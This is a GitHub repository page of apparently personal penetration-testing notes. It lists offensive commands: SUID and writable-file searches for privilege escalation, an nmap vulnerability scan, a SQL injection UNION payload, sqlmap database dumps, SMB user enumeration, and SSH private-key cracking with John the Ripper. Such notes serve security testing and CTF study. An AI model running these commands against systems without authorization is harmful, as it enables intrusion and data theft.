Skip to content

0xSeb/sec-notes

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

Sec notes

Privilege escalation exploits:

Find exploitable bins

  • find / -perm -u=s -type f 2>/dev/null | grep -v /proc
  • find / -perm -o+w -type f 2>/dev/null | grep -v /proc

Nmap useful commands:

  • Scan host deep : nmap -Pn -sS -sV --script=default,vuln -p- -T5 <ip>

Wordpress

  • TODO

SQL Injection

  • Example concatenate other table where injection is possible :
    • <injection_param> UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = '<tablename>'
  • SQLMAP
    • Dump databases:
      • sqlmap -u http://example.com/users/<injection_param> --dbs --match
    • Dump tables:
      • sqlmap -u http://example.com/users/<injection_param> -D <db_name> --tables --match

SMB

  • Enumerate SMB users
    • enum4linux -a <ip>

SSH

  • Bruteforce a SSH private key
    • python /usr/share/john/ssh2john.py <private_key> > private_key.hash
    • john --wordlist=/path/to/wordlists/wordlist.txt private_key.hash

Misc links:

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published